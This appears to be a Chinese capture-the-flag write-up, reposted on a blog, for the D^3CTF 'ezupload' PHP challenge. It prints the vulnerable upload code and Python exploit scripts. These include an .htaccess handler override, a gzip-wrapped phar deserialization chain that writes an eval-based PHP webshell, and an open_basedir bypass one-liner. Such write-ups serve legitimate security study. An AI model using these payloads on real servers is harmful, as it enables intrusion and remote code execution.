[D^3CTF]EZupload WP

又是看官方wp复现的一篇二手文章

web

ezupload

  <?php
    class dir
    {
        public $userdir;
        public $url;
        public $filename;
        public function __construct($url, $filename)
        {
            $this->userdir = "upload/" . md5($_SERVER["REMOTE_ADDR"]);
            $this->url = $url;
            $this->filename  =  $filename;
            if (!file_exists($this->userdir)) {
                mkdir($this->userdir, 0777, true);
            }
        }
        public function checkdir()
        {
            if ($this->userdir != "upload/" . md5($_SERVER["REMOTE_ADDR"])) {
                die('hacker!!!');
            }
        }
        public function checkurl()
        {
            $r = parse_url($this->url);
            if (!isset($r['scheme']) || preg_match("/file|php/i", $r['scheme'])) {
                die('hacker!!!');
            }
        }
        public function checkext()
        {
            if (stristr($this->filename, '..')) {
                die('hacker!!!');
            }
            if (stristr($this->filename, '/')) {
                die('hacker!!!');
            }
            $ext = substr($this->filename, strrpos($this->filename, ".") + 1);
            if (preg_match("/ph/i", $ext)) {
                die('hacker!!!');
            }
        }
        public function upload()
        {
            $this->checkdir();
            $this->checkurl();
            $this->checkext();
            $content = file_get_contents($this->url, NULL, NULL, 0, 2048);
            if (preg_match("/\<\?|value|on|type|flag|auto|set|\\\\/i", $content)) {
                die('hacker!!!');
            }
            file_put_contents($this->userdir . "/" . $this->filename, $content);
        }
        public function remove()
        {
            $this->checkdir();
            $this->checkext();
            if (file_exists($this->userdir . "/" . $this->filename)) {
                unlink($this->userdir . "/" . $this->filename);
            }
        }
        public function count($dir)
        {
            if ($dir === '') {
                $num = count(scandir($this->userdir)) - 2;
            } else {
                $num = count(scandir($dir)) - 2;
            }
            if ($num > 0) {
                return "you have $num files";
            } else {
                return "you don't have file";
            }
        }
        public function __toString()
        {
            return implode(" ", scandir(__DIR__ . "/" . $this->userdir));
        }
        public function __destruct()
        {
            $string = "your file in : " . $this->userdir;
            file_put_contents($this->filename . ".txt", $string);
            echo $string;
        }
    }

    if (!isset($_POST['action']) || !isset($_POST['url']) || !isset($_POST['filename'])) {
        highlight_file(__FILE__);
        die();
    }

    $dir = new dir($_POST['url'], $_POST['filename']);
    if ($_POST['action'] === "upload") {
        $dir->upload();
    } elseif ($_POST['action'] === "remove") {
        $dir->remove();
    } elseif ($_POST['action'] === "count") {
        if (!isset($_POST['dir'])) {
            echo $dir->count('');
        } else {
            echo $dir->count($_POST['dir']);
        }
    }

这题上传文件是通过post传递urlfilenameaction三个参数实现的,其中url为文件的内容,filename为文件名。

然后又是那个老问题,没有解析点,所以还是靠.htaccess或者.user.ini解决。
但是在checkurl()以及upload()中会检查文件内容,所以.user.ini是没法用了(auto_prepend_file、auto_append_file),.htaccessapplication/x-httpd-php也没法用了。

        public function checkurl()
        {
          ...
            if (!isset($r['scheme']) || preg_match("/file|php/i", $r['scheme'])) {
                die('hacker1111!!!');
        ...
   public function upload()
        {
          ...
            if (preg_match("/\<\?|value|on|type|flag|auto|set|\\\\/i", $content)) {
                die('hacker2222!!!');
            }
          ...

所以应该是一个新的考点,htaccessaddhandler不止application/x-httpd-php,还有比如说php7-scriptphp5-script等。

所以上传一个.htaccess

import requests
from requests_toolbelt import MultipartEncoder

url = 'http://localhost/ezupload.php'
m = MultipartEncoder(
    fields={'filename': '.htaccess', 'action': 'upload',
            'url': ''}
    )

r = requests.post(url=url, data=m,
                  headers={'Content-Type': m.content_type})
print r.text

此时文件内容为AddHandler php7-script .txt。这为什么可以绕过检测呢?
主要是checkurl()是直接检测变量url的内容,此时url的值为base64加密过的,所以绕过checkurl()。在upload()中读到的真实的内容,可是又因为upload()中并没有检测关键字php,所以AddHandler php7-script .txt成功绕过。

接着上传shell,但是upload()中将php尖括号什么都过滤了,短标签也没法用。所以考虑一下phar反序列化+压缩试一下绕过。

考虑一下如何构造phar文件,首先找到触发点。在upload()中有个文件操作函数file_put_contents($this->userdir . "/" . $this->filename, $content);应该能完成phar反序列化。因此我们的反序列化内容应该是通过url变量进去,然后在上面的$content中触发。
然后是构造哪些内容。看到有两个魔术函数

        public function __toString()
        {
            return implode(" ", scandir(__DIR__ . "/" . $this->userdir));
        }
        public function __destruct()
        {
            $string = "your file in : " . $this->userdir;
            file_put_contents($this->filename . ".txt", $string);
            echo $string;
        }

其中_toString可以输出_DIR_,而_destruct可以用来写shell
所以我们先来看一下当前路径有什么文件,phar文件如下生成:

<?php
class dir{
    public $userdir;
    public $url;
    public $filename;
}
$b = new dir();
$a = new dir("url", "filename");
$a->filename = 'upload/123/test';
$a->userdir = $b;

@unlink('vul.phar');
$phar = new Phar("vul.phar");
$phar->startBuffering();
$phar->addFromString("test.txt", "test");
$phar->setStub("GIF89a" . " __HALT_COMPILER(); ");
$phar->setMetadata($a);
$phar->stopBuffering();
@rename('vul.phar','1.jpg')
?>

上传代码如:

import requests
from requests_toolbelt import MultipartEncoder
import gzip
import base64
import urllib

url = 'http://c5f39613-77b8-4cd3-a6f4-fb5ce8770876.node3.buuoj.cn'

def upload():
    f_in = open("1.jpg", "rb")
    f_out = gzip.open("1.jpg.gz", "wb")
    f_out.writelines(f_in)
    f_out.close()
    f_in.close()

    f = open('1.jpg.gz', 'rb')
    dd = base64.b64encode(f.read())

    m = MultipartEncoder(
        fields={'filename': 'vul.phar.gz', 'action': 'upload',
                'url': 'data:image/png;base64,%s' % (dd)}
        )


    r = requests.post(url=url, data=m,
                    headers={'Content-Type': m.content_type})
    print r.text
def check():
    dd = 'phar://./upload/33c6f8457bd77fce0b109b4554e1a95c/vul.phar.gz/1.jpg'
    data = {'filename': 'zzz.txt', 'action': 'upload', 'url': dd }
    r = requests.post(url=url, data=data, headers={'Content-Type': 'application/x-www-form-urlencoded'})
    print r.text

upload()
check()

此时整个代码的流程:

  1. index.php会生成一个dir类(不妨记为$base),url=phar://./upload/33c6f8457bd77fce0b109b4554e1a95c/vul.gz.rar/1.jpg以及filename=la.txt
$dir = new dir($_POST['url'], $_POST['filename']);
  1. 代码运行到upload()下的file_get_contents函数时,触发反序列化
$content = file_get_contents($this->url, NULL, NULL, 0, 2048);
  1. 反序列化产生了一个dir类的对象$a,各参数如下:
$b = new dir();
$a = new dir();
$a->filename = 'upload/837ec5754f503cfaaee0929fd48974e7/test';
$a->userdir = $b;
  1. $a并没有执行任何函数,所以直接就来到了_destruct
public function __destruct()
        {
            $string = "your file in : " . $this->userdir;
            file_put_contents($this->filename . ".txt", $string);
            echo $string;
        }
  1. 在执行$string = "your file in : " . $this->userdir;的时候会将$a->userdir也就是$b强制转化为字符串,此时触发$b->__toString()
public function __toString()
        {
            return implode(" ", scandir(__DIR__ . "/" . $this->userdir));
        }
  1. $b->toString()返回了__DIR__/$b->userdir下所有文件,因为此时$b->userdir=null,所以返回了网站根目录下所有文件。
  2. 此时$b也走到了__destruct打印出your file in : $b->userdir,也就是your file in :
  3. 然后回到$a->__destruct打印出网站根目录下所有文件
  4. 此时运行完$base->upload()剩下的代码,$base也走到了__distruct打印出your file in : upload/33c6f8457bd77fce0b109b4554e1a95c

这就是以上的一整条链,但是我没搞懂的是,为什么打印结果和我的推测是相反的顺序,我也懒得去调试了。。

然后看一下网站根目录是在哪个路径下,根据上述步骤的第六步,只需要改一下$b->userdir='../'即可

接下来是写shell,刚才已经弄明白了整条链,现在也差不多,只需要利用__destruct()shell写入文件,代码如下:

<?php
class dir{
    public $userdir;
    public $url;
    public $filename;
}

$a = new dir("url", "filename");
$a->filename = '/var/www/html/2c75cf2681788ada/upload/33c6f8457bd77fce0b109b4554e1a95c/zz';
$a->userdir = '<?php eval($_REQUEST[122]); phpinfo();';

@unlink('vul.phar');
$phar = new Phar("vul.phar");
$phar->startBuffering();
$phar->addFromString("test.txt", "test");
$phar->setStub("GIF89a" . " __HALT_COMPILER(); ");
$phar->setMetadata($a);
$phar->stopBuffering();
@rename('vul.phar','1.jpg')
?>

直接利用$a__destruct来完成写入

public function __destruct()
        {
            $string = "your file in : " . $this->userdir;
            file_put_contents($this->filename . ".txt", $string);
            echo $string;
        }

然后访问zz.txt即可


发现open_basedir=/var/www/html,绕过

ini_set('open_basedir', '..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir', '/');var_dump(scandir('/'));

坑点

我真佛了。。buuoj上那个目录竟然会定时更新,我一开始得到的目录,然后后面用这个目录一直失败,后来发现环境竟然会更新,所以又需要从上传.htaccess,获取目录,上传shell重新再走一遍。本地打通了,结果远程一直打不通,头发都抓掉了,浪费了我的一天。。

未完待续

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,875评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,569评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,475评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,459评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,537评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,563评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,580评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,326评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,773评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,086评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,252评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,921评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,566评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,190评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,435评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,129评论 2 366
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,125评论 2 352

推荐阅读更多精彩内容